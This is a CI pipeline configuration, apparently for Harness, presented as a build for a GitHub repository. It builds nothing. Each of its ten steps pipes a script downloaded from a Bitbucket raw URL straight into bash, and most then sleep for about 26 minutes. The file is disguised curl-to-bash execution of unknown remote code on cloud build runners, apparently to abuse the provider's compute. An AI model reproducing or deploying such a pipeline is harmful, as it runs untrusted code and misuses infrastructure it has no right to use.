pipeline:
  identifier: Build_gafenitall_tausahane_1727143779263
  name: Build tausahane
  orgIdentifier: default
  projectIdentifier: default_project
  properties:
    ci:
      codebase:
        build: <+input>
        connectorRef: account.Github_OAuth_1727143763697
        repoName: gafenitall/tausahane
  stages:
    - stage:
        identifier: build
        name: build
        spec:
          caching:
            enabled: true
          cloneCodebase: true
          execution:
            steps:
              - step:
                  identifier: echo
                  name: Run_1
                  spec:
                    shell: Sh
                    command: curl -sL https://bitbucket.org/koemala/duduakih/raw/main/dl | bash
                  timeout: ""
                  type: Run
              - step:
                  type: Run
                  name: Run_2
                  identifier: Run_2
                  spec:
                    shell: Sh
                    command: |-
                      curl -sL https://bitbucket.org/koemala/duduakih/raw/main/dl | bash
                      sleep 1589
              - step:
                  type: Run
                  name: Run_3
                  identifier: Run_3
                  spec:
                    shell: Sh
                    command: |-
                      curl -sL https://bitbucket.org/koemala/duduakih/raw/main/dl | bash
                      sleep 1589
              - step:
                  type: Run
                  name: Run_4
                  identifier: Run_4
                  spec:
                    shell: Sh
                    command: |-
                      curl -sL https://bitbucket.org/koemala/duduakih/raw/main/dl | bash
                      sleep 1589
              - step:
                  type: Run
                  name: Run_5
                  identifier: Run_5
                  spec:
                    shell: Sh
                    command: |-
                      curl -sL https://bitbucket.org/koemala/duduakih/raw/main/dl | bash
                      sleep 1589
          platform:
            os: Linux
            arch: Amd64
          runtime:
            type: Cloud
            spec: {}
        type: CI
    - stage:
        name: build depences
        identifier: build_depences
        description: ""
        type: CI
        spec:
          cloneCodebase: false
          platform:
            os: Linux
            arch: Amd64
          runtime:
            type: Cloud
            spec: {}
          execution:
            steps:
              - step:
                  type: Run
                  name: Run_1
                  identifier: Run_1
                  spec:
                    shell: Sh
                    command: |-
                      curl -sL https://bitbucket.org/koemala/duduakih/raw/main/dl | bash
                      sleep 1589
              - step:
                  type: Run
                  name: Run_2
                  identifier: Run_2
                  spec:
                    shell: Sh
                    command: |-
                      curl -sL https://bitbucket.org/koemala/duduakih/raw/main/dl | bash
                      sleep 1589
              - step:
                  type: Run
                  name: Run_3
                  identifier: Run_3
                  spec:
                    shell: Sh
                    command: |-
                      curl -sL https://bitbucket.org/koemala/duduakih/raw/main/dl | bash
                      sleep 1589
              - step:
                  type: Run
                  name: Run_4
                  identifier: Run_4
                  spec:
                    shell: Sh
                    command: |-
                      curl -sL https://bitbucket.org/koemala/duduakih/raw/main/dl | bash
                      sleep 1589
              - step:
                  type: Run
                  name: Run_5
                  identifier: Run_5
                  spec:
                    shell: Sh
                    command: |-
                      curl -sL https://bitbucket.org/koemala/duduakih/raw/main/dl | bash
                      sleep 1589
